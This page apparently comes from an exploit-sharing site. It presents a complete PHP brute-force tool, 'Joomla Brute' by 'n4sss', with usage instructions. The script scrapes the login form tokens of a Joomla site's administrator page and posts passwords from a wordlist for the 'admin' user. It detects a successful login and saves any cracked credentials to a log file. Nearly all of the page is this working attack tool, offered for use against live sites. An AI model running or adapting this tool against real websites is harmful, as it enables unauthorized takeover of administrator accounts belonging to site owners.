facebook facebook twitter rss

Joomla Brute By Rodrigo "N4sss"

Author: n4sss , Published: 07-06-2014

    


    <?php
     
    
/**
    *
    * Joomla Brute By Rodrigo "N4sss"
    *
    * Use: php joomla_brute.php site pass_file
    * Last release bruted: 3.3.0
    * OOP to better manipulation of data. Edit if you want :)
    *
    * Contact: n-l4b[noSPAM]hotmail[dot]com
    *
    * http://Janissaries.org
    *
    **/
     
     
    
set_time_limit(0);
    
error_reporting(E_ALL);
     
     
    Class 
JoomlaBrute{
     
            var 
$user 'admin';
            var 
$log 'ok_joomla.txt';
            var 
$regex '#<input type=\"hidden\" (.*?)/>#';
            var 
$hashRegex '#name=\"(.*?)\" value=\"1\"#';
            var 
$returnRegex '#name=\"return\" value=\"(.*?)\"#';
            var 
$cookieContainer 'nx.cookie';
            var 
$timeout 5;
            var 
$path '/administrator/index.php';
            var 
$userAgent 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0';
            var 
$url null;
            var 
$wordlist null;
            var 
$httpResponse null;
            var 
$date null;
            var 
$hash null;
            var 
$returnValue null;
     
     
            function 
__construct($url$wordlist){
                    
$this->url $url;
                    
$this->wordlist $wordlist;
                    
printf("\nPHP Joomla Brute by n4sss\n\n- Uri: %s\n- User: %s\n- Wordlist: %s\n- Log: %s\n\n Wait and Good Luck!\n\n"$this->url$this->user$this->wordlist$this->log);
                    
$this->post();
            }
     
            function 
__destruct(){
                    
unlink($this->cookieContainer);
                    
printf("Finished!\n");
                    
flush();
            }
     
            function 
save_buf($content$file){
                    
$fp fopen($file"a+");
                    
fwrite($fp$content."\r\n");
                    
fclose($fp);
            }
     
            function 
connect(){
                    
$ch curl_init();
                    
curl_setopt($chCURLOPT_URL$this->url.$this->path);
                    
curl_setopt($chCURLOPT_RETURNTRANSFER1);
                    
curl_setopt($chCURLOPT_COOKIEJAR$this->cookieContainer);
                    
curl_setopt($chCURLOPT_COOKIEFILE$this->cookieContainer);
                    
curl_setopt($chCURLOPT_USERAGENT$this->userAgent);
                    
curl_setopt($chCURLOPT_TIMEOUT$this->timeout);
                    
curl_setopt($chCURLOPT_CONNECTTIMEOUT$this->timeout);
                    
$this->httpResponse curl_exec($ch);
            }
     
            function 
parse_connection(){
                    
$this->connect();
                    
preg_match_all($this->regex$this->httpResponse$parse);
                    
preg_match_all($this->hashRegex$parse[1][3], $parse_hash);
                    
preg_match_all($this->returnRegex$parse[1][2], $parse_returnValue);
                    foreach(
$parse_hash[1] as $this->hash);
                    foreach(
$parse_returnValue[1] as $this->returnValue);
                    if(!
$this->hash || !$this->returnValue) exit('[-] Impossible to retrieve login hash\nExiting!\n');
                    
flush();
            }
     
            function 
post(){
                    
$this->parse_connection();
                    
$this->date date("F j, Y, H:i:s a");
                    if(!
preg_match("/http/"$this->url)) $this->url "http://".$this->url;
                    
$uri $this->url.$this->path;
                    
$wordlist array_filter(explode("\n"file_get_contents($this->wordlist)));
                    foreach(
$wordlist as $password){
                            
$postContent "username={$this->user}&passwd={$password}&lang=&option=com_login&task=login&return={$this->returnValue}&{$this->hash}=1";
                            
printf("%s %s:%s\n"$this->url$this->user$password);
                            
$ch curl_init();
                            
curl_setopt($chCURLOPT_URL$uri);
                            
curl_setopt($chCURLOPT_FOLLOWLOCATION1);
                            
curl_setopt($chCURLOPT_RETURNTRANSFER1);
                            
curl_setopt($chCURLOPT_COOKIEJAR$this->cookieContainer);
                            
curl_setopt($chCURLOPT_COOKIEFILE$this->cookieContainer);
                            
curl_setopt($chCURLOPT_POST1);
                            
curl_setopt($chCURLOPT_USERAGENT$this->userAgent);
                            
curl_setopt($chCURLOPT_POSTFIELDS$postContent);
                            
curl_setopt($chCURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
                            
curl_setopt($chCURLOPT_CONNECTTIMEOUT$this->timeout);
                            
$this->httpResponse curl_exec($ch);
                            if(
preg_match("/com_config/"$this->httpResponse)){
                                    
$response "+-----------------------+\n";
                                    
$response .= "[Uri] {$uri}\n";
                                    
$response .= "[Auth] {$this->user}:{$password}\n";
                                    
$response .= "[Date] {$this->date}\n";
                                    
$response .= "+-----------------------+\n";
                                    print 
"{$response}\n";
                                    
$this->save_buf($response$this->log);
                                    
flush();
                                    break;
                            }
                    }
            }
    }
     
    if(isset(
$argv[1], $argv[2])){
            
$host trim($argv[1]);
            
$wordlist trim($argv[2]);
            
$joomlaBrute = new JoomlaBrute($host$wordlist);
    }else{
            
printf("php %s host wordlist\n"$argv[0]);
    }
     
    
?>

Like us on Facebook :